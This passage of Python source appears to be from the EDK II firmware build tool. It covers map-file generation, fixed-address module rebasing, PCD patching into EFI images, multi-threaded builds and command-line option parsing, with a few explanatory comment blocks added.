GuidName = re.compile("\(GUID=[-a-fA-F0-9]+")
for FvName in Wa.FdfProfile.FvDict.keys():
FvMapBuffer = os.path.join(Wa.FvDir, FvName + '.Fv.map')
if not os.path.exists(FvMapBuffer):
continue
FvMap = open(FvMapBuffer, 'r')
#skip FV size information
FvMap.readline()
FvMap.readline()
FvMap.readline()
FvMap.readline()
for Line in FvMap:
MatchGuid = GuidPattern.match(Line)
if MatchGuid != None:
#
# Replace GUID with module name
#
GuidString = MatchGuid.group()
if GuidString.upper() in ModuleList:
Line = Line.replace(GuidString, ModuleList[GuidString.upper()].Name)
MapBuffer.write('%s' % (Line))
#
# Add the debug image full path.
#
MatchGuid = GuidName.match(Line)
if MatchGuid != None:
GuidString = MatchGuid.group().split("=")[1]
if GuidString.upper() in ModuleList:
MapBuffer.write('(IMAGE=%s)\n' % (os.path.join(ModuleList[GuidString.upper()].DebugDir, ModuleList[GuidString.upper()].Name + '.efi')))
FvMap.close()
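# --- Illustrative sketch, not part of the original build tool ---
# _CollectFvMapBuffer() above rewrites FV map lines by replacing a leading
# GUID token with the corresponding module name.  The substitution itself
# boils down to the helper below ('re' is already imported by this module,
# see GuidPattern above); the sample GUID and name are invented placeholders.
def _replace_guid_with_name_sketch(line, guid_to_module_name):
    match = re.match("[-a-fA-F0-9]+", line)
    if match and match.group().upper() in guid_to_module_name:
        return line.replace(match.group(), guid_to_module_name[match.group().upper()])
    return line
# Example:
#   _replace_guid_with_name_sketch(
#       "11223344-5566-7788-99aa-bbccddeeff00 0x1000",
#       {"11223344-5566-7788-99AA-BBCCDDEEFF00": "MyDriver"})
#   returns "MyDriver 0x1000"
# ----------------------------------------------------------------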
## Collect MAP information of all modules
#
def _CollectModuleMapBuffer (self, MapBuffer, ModuleList):
sys.stdout.write ("Generate Load Module At Fix Address Map")
sys.stdout.flush()
PatchEfiImageList = []
PeiModuleList = {}
BtModuleList = {}
RtModuleList = {}
SmmModuleList = {}
PeiSize = 0
BtSize = 0
RtSize = 0
# reserve 4K in SMRAM so that SMM module addresses do not start from 0.
SmmSize = 0x1000
IsIpfPlatform = False
if 'IPF' in self.ArchList:
IsIpfPlatform = True
for ModuleGuid in ModuleList:
Module = ModuleList[ModuleGuid]
GlobalData.gProcessingFile = "%s [%s, %s, %s]" % (Module.MetaFile, Module.Arch, Module.ToolChain, Module.BuildTarget)
OutputImageFile = ''
for ResultFile in Module.CodaTargetList:
if str(ResultFile.Target).endswith('.efi'):
#
# module list for PEI, DXE, RUNTIME and SMM
#
OutputImageFile = os.path.join(Module.OutputDir, Module.Name + '.efi')
ImageClass = PeImageClass (OutputImageFile)
if not ImageClass.IsValid:
EdkLogger.error("build", FILE_PARSE_FAILURE, ExtraData=ImageClass.ErrorInfo)
ImageInfo = PeImageInfo(Module.Name, Module.Guid, Module.Arch, Module.OutputDir, Module.DebugDir, ImageClass)
if Module.ModuleType in ['PEI_CORE', 'PEIM', 'COMBINED_PEIM_DRIVER','PIC_PEIM', 'RELOCATABLE_PEIM', 'DXE_CORE']:
PeiModuleList[Module.MetaFile] = ImageInfo
PeiSize += ImageInfo.Image.Size
elif Module.ModuleType in ['BS_DRIVER', 'DXE_DRIVER', 'UEFI_DRIVER']:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['DXE_RUNTIME_DRIVER', 'RT_DRIVER', 'DXE_SAL_DRIVER', 'SAL_RT_DRIVER']:
RtModuleList[Module.MetaFile] = ImageInfo
# IPF runtime drivers need to be aligned on a 2-page boundary.
if IsIpfPlatform and ImageInfo.Image.Size % 0x2000 != 0:
ImageInfo.Image.Size = (ImageInfo.Image.Size / 0x2000 + 1) * 0x2000
RtSize += ImageInfo.Image.Size
elif Module.ModuleType in ['SMM_CORE', 'DXE_SMM_DRIVER']:
SmmModuleList[Module.MetaFile] = ImageInfo
SmmSize += ImageInfo.Image.Size
if Module.ModuleType == 'DXE_SMM_DRIVER':
PiSpecVersion = '0x00000000'
if 'PI_SPECIFICATION_VERSION' in Module.Module.Specification:
PiSpecVersion = Module.Module.Specification['PI_SPECIFICATION_VERSION']
# for PI specification < PI 1.1, a DXE_SMM_DRIVER also runs as a boot-time driver.
if int(PiSpecVersion, 16) < 0x0001000A:
BtModuleList[Module.MetaFile] = ImageInfo
BtSize += ImageInfo.Image.Size
break
#
# EFI image is final target.
# Check whether the EFI image contains patchable FixAddress-related PCDs.
#
if OutputImageFile != '':
ModuleIsPatch = False
for Pcd in Module.ModulePcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
for Pcd in Module.LibraryPcdList:
if Pcd.Type == TAB_PCDS_PATCHABLE_IN_MODULE and Pcd.TokenCName in TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_LIST:
ModuleIsPatch = True
break
if not ModuleIsPatch:
continue
#
# Module includes the patchable load fix address PCDs.
# It will be fixed up later.
#
PatchEfiImageList.append (OutputImageFile)
#
# Get Top Memory address
#
ReservedRuntimeMemorySize = 0
TopMemoryAddress = 0
if self.LoadFixAddress == 0xFFFFFFFFFFFFFFFF:
TopMemoryAddress = 0
else:
TopMemoryAddress = self.LoadFixAddress
if TopMemoryAddress < RtSize + BtSize + PeiSize:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS is too low to load driver")
# Keep IPF runtime drivers aligned on a 2-page boundary.
if IsIpfPlatform:
ReservedRuntimeMemorySize = TopMemoryAddress % 0x2000
RtSize = RtSize + ReservedRuntimeMemorySize
#
# Patch FixAddress related PCDs into EFI image
#
for EfiImage in PatchEfiImageList:
EfiImageMap = EfiImage.replace('.efi', '.map')
if not os.path.exists(EfiImageMap):
continue
#
# Get PCD offset in EFI image by GenPatchPcdTable function
#
PcdTable = parsePcdInfoFromMapFile(EfiImageMap, EfiImage)
#
# Patch real PCD value by PatchPcdValue tool
#
for PcdInfo in PcdTable:
ReturnValue = 0
if PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_PEI_PAGE_SIZE_DATA_TYPE, str (PeiSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_DXE_PAGE_SIZE_DATA_TYPE, str (BtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_RUNTIME_PAGE_SIZE_DATA_TYPE, str (RtSize/0x1000))
elif PcdInfo[0] == TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE and len (SmmModuleList) > 0:
ReturnValue, ErrorInfo = PatchBinaryFile (EfiImage, PcdInfo[1], TAB_PCDS_PATCHABLE_LOAD_FIX_ADDRESS_SMM_PAGE_SIZE_DATA_TYPE, str (SmmSize/0x1000))
if ReturnValue != 0:
EdkLogger.error("build", PARAMETER_INVALID, "Patch PCD value failed", ExtraData=ErrorInfo)
MapBuffer.write('PEI_CODE_PAGE_NUMBER = 0x%x\n' % (PeiSize/0x1000))
MapBuffer.write('BOOT_CODE_PAGE_NUMBER = 0x%x\n' % (BtSize/0x1000))
MapBuffer.write('RUNTIME_CODE_PAGE_NUMBER = 0x%x\n' % (RtSize/0x1000))
if len (SmmModuleList) > 0:
MapBuffer.write('SMM_CODE_PAGE_NUMBER = 0x%x\n' % (SmmSize/0x1000))
PeiBaseAddr = TopMemoryAddress - RtSize - BtSize
BtBaseAddr = TopMemoryAddress - RtSize
RtBaseAddr = TopMemoryAddress - ReservedRuntimeMemorySize
self._RebaseModule (MapBuffer, PeiBaseAddr, PeiModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, BtBaseAddr, BtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, RtBaseAddr, RtModuleList, TopMemoryAddress == 0)
self._RebaseModule (MapBuffer, 0x1000, SmmModuleList, AddrIsOffset = False, ModeIsSmm = True)
MapBuffer.write('\n\n')
sys.stdout.write ("\n")
sys.stdout.flush()
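# --- Illustrative note, not part of the original build tool ---
# With a fixed top-of-memory address the regions computed above are stacked
# downward from TopMemoryAddress:
#     RtBaseAddr  = Top - ReservedRuntimeMemorySize   (runtime drivers)
#     BtBaseAddr  = Top - RtSize                      (boot-time drivers)
#     PeiBaseAddr = Top - RtSize - BtSize             (PEI/DXE core modules)
# For example (values invented), Top = 0x1000000, RtSize = 0x40000 and
# BtSize = 0x100000 give BtBaseAddr = 0xFC0000 and PeiBaseAddr = 0xEC0000,
# while SMM modules are laid out upward from offset 0x1000 in SMRAM.
# ----------------------------------------------------------------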
## Save platform Map file
#
def _SaveMapFile (self, MapBuffer, Wa):
#
# Determine the map file path.
#
MapFilePath = os.path.join(Wa.BuildDir, Wa.Name + '.map')
#
# Save address map into MAP file.
#
SaveFileOnChange(MapFilePath, MapBuffer.getvalue(), False)
MapBuffer.close()
if self.LoadFixAddress != 0:
sys.stdout.write ("\nLoad Module At Fix Address Map file can be found at %s\n" %(MapFilePath))
sys.stdout.flush()
## Build active platform for different build targets and different tool chains
#
def _BuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
self.Progress.Stop("done!")
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
for Module in Pa.Platform.Modules:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
self.BuildModules.append(Ma)
self._BuildPa(self.Target, Pa)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platform with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build active module for different build targets, different tool chains and different archs
#
def _BuildModule(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
#
# module build needs platform build information, so get platform
# AutoGen first
#
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress,
self.ModuleFile
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
Wa.CreateMakeFile(False)
self.Progress.Stop("done!")
MaList = []
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Ma = ModuleAutoGen(Wa, self.ModuleFile, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None: continue
MaList.append(Ma)
self.BuildModules.append(Ma)
if not Ma.IsBinaryModule:
self._Build(self.Target, Ma, BuildModule=True)
self.BuildReport.AddPlatformReport(Wa, MaList)
if MaList == []:
EdkLogger.error(
'build',
BUILD_ERROR,
"Module for [%s] is not a component of active platform."\
" Please make sure that the ARCH and inf file path are"\
" given in the same as in [%s]" %\
(', '.join(Wa.ArchList), self.PlatformFile),
ExtraData=self.ModuleFile
)
# Create MAP file when Load Fix Address is enabled.
if self.Target == "fds" and self.Fdf:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
#
# Rebase module to the preferred memory address before GenFds
#
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
#
# create FDS again for the updated EFI image
#
self._Build("fds", Wa)
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile (MapBuffer, Wa)
## Build a platform in multi-thread mode
#
def _MultiThreadBuildPlatform(self):
for BuildTarget in self.BuildTargetList:
GlobalData.gGlobalDefines['TARGET'] = BuildTarget
for ToolChain in self.ToolChainList:
GlobalData.gGlobalDefines['TOOLCHAIN'] = ToolChain
GlobalData.gGlobalDefines['TOOL_CHAIN_TAG'] = ToolChain
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag,
self.Progress
)
self.Fdf = Wa.FdfFile
self.LoadFixAddress = Wa.Platform.LoadFixAddress
self.BuildReport.AddPlatformReport(Wa)
Wa.CreateMakeFile(False)
# multi-thread exit flag
ExitFlag = threading.Event()
ExitFlag.clear()
for Arch in Wa.ArchList:
GlobalData.gGlobalDefines['ARCH'] = Arch
Pa = PlatformAutoGen(Wa, self.PlatformFile, BuildTarget, ToolChain, Arch)
if Pa == None:
continue
ModuleList = []
for Inf in Pa.Platform.Modules:
ModuleList.append(Inf)
# Add the INF only list in FDF
if GlobalData.gFdfParser != None:
for InfName in GlobalData.gFdfParser.Profile.InfList:
Inf = PathClass(NormPath(InfName), self.WorkspaceDir, Arch)
if Inf in Pa.Platform.Modules:
continue
ModuleList.append(Inf)
for Module in ModuleList:
# Get ModuleAutoGen object to generate C code file and makefile
Ma = ModuleAutoGen(Wa, Module, BuildTarget, ToolChain, Arch, self.PlatformFile)
if Ma == None:
continue
# Do not run AutoGen for the targets 'clean', 'cleanlib', 'cleanall', 'run', 'fds'
if self.Target not in ['clean', 'cleanlib', 'cleanall', 'run', 'fds']:
# for target which must generate AutoGen code and makefile
if not self.SkipAutoGen or self.Target == 'genc':
Ma.CreateCodeFile(True)
if self.Target == "genc":
continue
if not self.SkipAutoGen or self.Target == 'genmake':
Ma.CreateMakeFile(True)
if self.Target == "genmake":
continue
self.BuildModules.append(Ma)
self.Progress.Stop("done!")
for Ma in self.BuildModules:
# Generate build task for the module
if not Ma.IsBinaryModule:
Bt = BuildTask.New(ModuleMakeUnit(Ma, self.Target))
# Break build if any build thread has error
if BuildTask.HasError():
# we need a full version of makefile for platform
ExitFlag.set()
BuildTask.WaitForComplete()
Pa.CreateMakeFile(False)
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Start task scheduler
if not BuildTask.IsOnGoing():
BuildTask.StartScheduler(self.ThreadNumber, ExitFlag)
# in case there's an interruption, we need a full version of the platform makefile
Pa.CreateMakeFile(False)
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
#
# Save temp tables to a TmpTableDict.
#
for Key in Wa.BuildDatabase._CACHE_:
if Wa.BuildDatabase._CACHE_[Key]._RawData and Wa.BuildDatabase._CACHE_[Key]._RawData._Table and Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table:
if TemporaryTablePattern.match(Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table):
TmpTableDict[Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Table] = Wa.BuildDatabase._CACHE_[Key]._RawData._Table.Cur
#
#
# All modules have been put in build tasks queue. Tell task scheduler
# to exit if all tasks are completed
#
ExitFlag.set()
BuildTask.WaitForComplete()
self.CreateAsBuiltInf()
#
# Check for build error, and raise exception if one
# has been signaled.
#
if BuildTask.HasError():
EdkLogger.error("build", BUILD_ERROR, "Failed to build module", ExtraData=GlobalData.gBuildingModule)
# Create MAP file when Load Fix Address is enabled.
if self.Target in ["", "all", "fds"]:
for Arch in Wa.ArchList:
#
# Check whether the set fix address is above 4G for 32bit image.
#
if (Arch == 'IA32' or Arch == 'ARM') and self.LoadFixAddress != 0xFFFFFFFFFFFFFFFF and self.LoadFixAddress >= 0x100000000:
EdkLogger.error("build", PARAMETER_INVALID, "FIX_LOAD_TOP_MEMORY_ADDRESS can't be set to larger than or equal to 4G for the platorm with IA32 or ARM arch modules")
#
# Get Module List
#
ModuleList = {}
for Pa in Wa.AutoGenObjectList:
for Ma in Pa.ModuleAutoGenList:
if Ma == None:
continue
if not Ma.IsLibrary:
ModuleList[Ma.Guid.upper()] = Ma
#
# Rebase module to the preferred memory address before GenFds
#
MapBuffer = StringIO('')
if self.LoadFixAddress != 0:
self._CollectModuleMapBuffer(MapBuffer, ModuleList)
if self.Fdf:
#
# Generate FD image if there's a FDF file found
#
LaunchCommand(Wa.GenFdsCommand, os.getcwd())
#
# Create MAP file for all platform FVs after GenFds.
#
self._CollectFvMapBuffer(MapBuffer, Wa, ModuleList)
#
# Save MAP buffer into MAP file.
#
self._SaveMapFile(MapBuffer, Wa)
## Generate GuidedSectionTools.txt in the FV directories.
#
def CreateGuidedSectionToolsFile(self):
for BuildTarget in self.BuildTargetList:
for ToolChain in self.ToolChainList:
Wa = WorkspaceAutoGen(
self.WorkspaceDir,
self.PlatformFile,
BuildTarget,
ToolChain,
self.ArchList,
self.BuildDatabase,
self.TargetTxt,
self.ToolDef,
self.Fdf,
self.FdList,
self.FvList,
self.CapList,
self.SkuId,
self.UniFlag
)
FvDir = Wa.FvDir
if not os.path.exists(FvDir):
continue
for Arch in self.ArchList:
# Build up the list of supported architectures for this build
prefix = '%s_%s_%s_' % (BuildTarget, ToolChain, Arch)
# Look through the tool definitions for GUIDed tools
guidAttribs = []
for (attrib, value) in self.ToolDef.ToolsDefTxtDictionary.iteritems():
if attrib.upper().endswith('_GUID'):
split = attrib.split('_')
thisPrefix = '_'.join(split[0:3]) + '_'
if thisPrefix == prefix:
guid = self.ToolDef.ToolsDefTxtDictionary[attrib]
guid = guid.lower()
toolName = split[3]
path = '_'.join(split[0:4]) + '_PATH'
path = self.ToolDef.ToolsDefTxtDictionary[path]
path = self.GetFullPathOfTool(path)
guidAttribs.append((guid, toolName, path))
# Write out GuidedSectionTools.txt
toolsFile = os.path.join(FvDir, 'GuidedSectionTools.txt')
toolsFile = open(toolsFile, 'wt')
for guidedSectionTool in guidAttribs:
print >> toolsFile, ' '.join(guidedSectionTool)
toolsFile.close()
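# --- Illustrative sketch, not part of the original build tool ---
# Each line written to GuidedSectionTools.txt above has the form
#     <guid> <tool name> <tool path>
# A minimal reader for that format is sketched below; the function name and
# the lower-casing of the GUID key are assumptions made only for illustration.
def _read_guided_section_tools_sketch(path):
    tools = {}
    with open(path, 'r') as tools_file:
        for line in tools_file:
            parts = line.split()
            if len(parts) == 3:
                guid, tool_name, tool_path = parts
                tools[guid.lower()] = (tool_name, tool_path)
    return tools
# ----------------------------------------------------------------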
## Returns the full path of the tool.
#
def GetFullPathOfTool (self, tool):
if os.path.exists(tool):
return os.path.realpath(tool)
else:
# We need to search for the tool using the
# PATH environment variable.
for dirInPath in os.environ['PATH'].split(os.pathsep):
foundPath = os.path.join(dirInPath, tool)
if os.path.exists(foundPath):
return os.path.realpath(foundPath)
# If the tool was not found in the path then we just return
# the input tool.
return tool
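# --- Illustrative note, not part of the original build tool ---
# GetFullPathOfTool() above performs a manual search of the directories in the
# PATH environment variable.  As an aside, on Python 3.3+ the standard library
# offers shutil.which() for this kind of lookup; a rough equivalent (ignoring
# the executable-permission check that shutil.which() performs) would be:
#
#     import shutil
#     def _full_path_of_tool_sketch(tool):
#         found = shutil.which(tool)
#         return os.path.realpath(found) if found else tool
#
# It is kept as a comment here because this tool targets Python 2, where
# shutil.which() is not available.
# ----------------------------------------------------------------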
## Launch the module or platform build
#
def Launch(self):
if not self.ModuleFile:
if not self.SpawnMode or self.Target not in ["", "all"]:
self.SpawnMode = False
self._BuildPlatform()
else:
self._MultiThreadBuildPlatform()
self.CreateGuidedSectionToolsFile()
else:
self.SpawnMode = False
self._BuildModule()
if self.Target == 'cleanall':
self.Db.Close()
RemoveDirectory(os.path.dirname(GlobalData.gDatabasePath), True)
def CreateAsBuiltInf(self):
for Module in self.BuildModules:
Module.CreateAsBuiltInf()
self.BuildModules = []
## Do some clean-up work when an error occurs
def Relinquish(self):
OldLogLevel = EdkLogger.GetLevel()
EdkLogger.SetLevel(EdkLogger.ERROR)
#self.DumpBuildData()
Utils.Progressor.Abort()
if self.SpawnMode == True:
BuildTask.Abort()
EdkLogger.SetLevel(OldLogLevel)
def DumpBuildData(self):
CacheDirectory = os.path.dirname(GlobalData.gDatabasePath)
Utils.CreateDirectory(CacheDirectory)
Utils.DataDump(Utils.gFileTimeStampCache, os.path.join(CacheDirectory, "gFileTimeStampCache"))
Utils.DataDump(Utils.gDependencyDatabase, os.path.join(CacheDirectory, "gDependencyDatabase"))
def RestoreBuildData(self):
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gFileTimeStampCache")
if Utils.gFileTimeStampCache == {} and os.path.isfile(FilePath):
Utils.gFileTimeStampCache = Utils.DataRestore(FilePath)
if Utils.gFileTimeStampCache == None:
Utils.gFileTimeStampCache = {}
FilePath = os.path.join(os.path.dirname(GlobalData.gDatabasePath), "gDependencyDatabase")
if Utils.gDependencyDatabase == {} and os.path.isfile(FilePath):
Utils.gDependencyDatabase = Utils.DataRestore(FilePath)
if Utils.gDependencyDatabase == None:
Utils.gDependencyDatabase = {}
def ParseDefines(DefineList=[]):
DefineDict = {}
if DefineList != None:
for Define in DefineList:
DefineTokenList = Define.split("=", 1)
if not GlobalData.gMacroNamePattern.match(DefineTokenList[0]):
EdkLogger.error('build', FORMAT_INVALID,
"The macro name must be in the pattern [A-Z][A-Z0-9_]*",
ExtraData=DefineTokenList[0])
if len(DefineTokenList) == 1:
DefineDict[DefineTokenList[0]] = "TRUE"
else:
DefineDict[DefineTokenList[0]] = DefineTokenList[1].strip()
return DefineDict
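# --- Illustrative note, not part of the original build tool ---
# ParseDefines() turns "-D" style macro arguments into a dictionary, e.g.
#     ParseDefines(["MY_FLAG", "MY_PATH=C:\\Work"])
#     returns {'MY_FLAG': 'TRUE', 'MY_PATH': 'C:\\Work'}
# (the macro names above are invented; real names must match
# gMacroNamePattern, i.e. [A-Z][A-Z0-9_]*).
# ----------------------------------------------------------------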
gParamCheck = []
def SingleCheckCallback(option, opt_str, value, parser):
if option not in gParamCheck:
setattr(parser.values, option.dest, value)
gParamCheck.append(option)
else:
parser.error("Option %s only allows one instance in command line!" % option)
## Parse command line options
#
# Using standard Python module optparse to parse command line option of this tool.
#
# @retval Opt A optparse.Values object containing the parsed options
# @retval Args Target of build command
#
def MyOptionParser():
Parser = OptionParser(description=__copyright__,version=__version__,prog="build.exe",usage="%prog [options] [all|fds|genc|genmake|clean|cleanall|cleanlib|modules|libraries|run]")
Parser.add_option("-a", "--arch", action="append", type="choice", choices=['IA32','X64','IPF','EBC','ARM', 'AARCH64'], dest="TargetArch",
help="ARCHS is one of list: IA32, X64, IPF, ARM, AARCH64 or EBC, which overrides target.txt's TARGET_ARCH definition. To specify more archs, please repeat this option.")
Parser.add_option("-p", "--platform", action="callback", type="string", dest="PlatformFile", callback=SingleCheckCallback,
help="Build the platform specified by the DSC file name argument, overriding target.txt's ACTIVE_PLATFORM definition.")
Parser.add_option("-m", "--module", action="callback", type="string", dest="ModuleFile", callback=SingleCheckCallback,
help="Build the module specified by the INF file name argument.")
Parser.add_option("-b", "--buildtarget", type="string", dest="BuildTarget", help="Using the TARGET to build the platform, overriding target.txt's TARGET definition.",
action="append")
Parser.add_option("-t", "--tagname", action="append", type="string", dest="ToolChain",
help="Using the Tool Chain Tagname to build the platform, overriding target.txt's TOOL_CHAIN_TAG definition.")
Parser.add_option("-x", "--sku-id", action="callback", type="string", dest="SkuId", callback=SingleCheckCallback,
help="Using this name of SKU ID to build the platform, overriding SKUID_IDENTIFIER in DSC file.")
Parser.add_option("-n", action="callback", type="int", dest="ThreadNumber", callback=SingleCheckCallback,
help="Build the platform using multi-threaded compiler. The value overrides target.txt's MAX_CONCURRENT_THREAD_NUMBER. Less than 2 will disable multi-thread builds.")
Parser.add_option("-f", "--fdf", action="callback", type="string", dest="FdfFile", callback=SingleCheckCallback,
help="The name of the FDF file to use, which overrides the setting in the DSC file.")
Parser.add_option("-r", "--rom-image", action="append", type="string", dest="RomImage", default=[],
help="The name of FD to be generated. The name must be from [FD] section in FDF file.")
Parser.add_option("-i", "--fv-image", action="append", type="string", dest="FvImage", default=[],
help="The name of FV to be generated. The name must be from [FV] section in FDF file.")
Parser.add_option("-C", "--capsule-image", action="append", type="string", dest="CapName", default=[],
help="The name of Capsule to be generated. The name must be from [Capsule] section in FDF file.")
Parser.add_option("-u", "--skip-autogen", action="store_true", dest="SkipAutoGen", help="Skip AutoGen step.")
Parser.add_option("-e", "--re-parse", action="store_true", dest="Reparse", help="Re-parse all meta-data files.")
Parser.add_option("-c", "--case-insensitive", action="store_true", dest="CaseInsensitive", default=False, help="Don't check case of file name.")
Parser.add_option("-w", "--warning-as-error", action="store_true", dest="WarningAsError", help="Treat warning in tools as error.")
Parser.add_option("-j", "--log", action="store", dest="LogFile", help="Put log in specified file as well as on console.")
Parser.add_option("-s", "--silent", action="store_true", type=None, dest="SilentMode",
help="Make use of silent mode of (n)make.")
Parser.add_option("-q", "--quiet", action="store_true", type=None, help="Disable all messages except FATAL ERRORS.")
Parser.add_option("-v", "--verbose", action="store_true", type=None, help="Turn on verbose output with informational messages printed, "\
"including library instances selected, final dependency expression, "\
"and warning messages, etc.")
Parser.add_option("-d", "--debug", action="store", type="int", help="Enable debug messages at specified level.")
Parser.add_option("-D", "--define", action="append", type="string", dest="Macros", help="Macro: \"Name [= Value]\".")
Parser.add_option("-y", "--report-file", action="store", dest="ReportFile", help="Create/overwrite the report to the specified filename.")
Parser.add_option("-Y", "--report-type", action="append", type="choice", choices=['PCD','LIBRARY','FLASH','DEPEX','BUILD_FLAGS','FIXED_ADDRESS', 'EXECUTION_ORDER'], dest="ReportType", default=[],
help="Flags that control the type of build report to generate. Must be one of: [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS, EXECUTION_ORDER]. "\
"To specify more than one flag, repeat this option on the command line and the default flag set is [PCD, LIBRARY, FLASH, DEPEX, BUILD_FLAGS, FIXED_ADDRESS]")
Parser.add_option("-F", "--flag", action="store", type="string", dest="Flag",
help="Specify the specific option to parse EDK UNI file. Must be one of: [-c, -s]. -c is for EDK framework UNI file, and -s is for EDK UEFI UNI file. "\
"This option can also be specified by setting *_*_*_BUILD_FLAGS in [BuildOptions] section of platform DSC. If they are both specified, this value "\
"will override the setting in [BuildOptions] section of platform DSC.")
Parser.add_option("-N", "--no-cache", action="store_true", dest="DisableCache", default=False, help="Disable build cache mechanism")
Parser.add_option("--conf", action="store", type="string", dest="ConfDirectory", help="Specify the customized Conf directory.")
Parser.add_option("--check-usage", action="store_true", dest="CheckUsage", default=False, help="Check usage content of entries listed in INF file.")
Parser.add_option("--ignore-sources", action="store_true", dest="IgnoreSources", default=False, help="Focus to a binary build and ignore all source files")
(Opt, Args)=Parser.parse_args()
return (Opt, Args)
## Tool entrance method
#
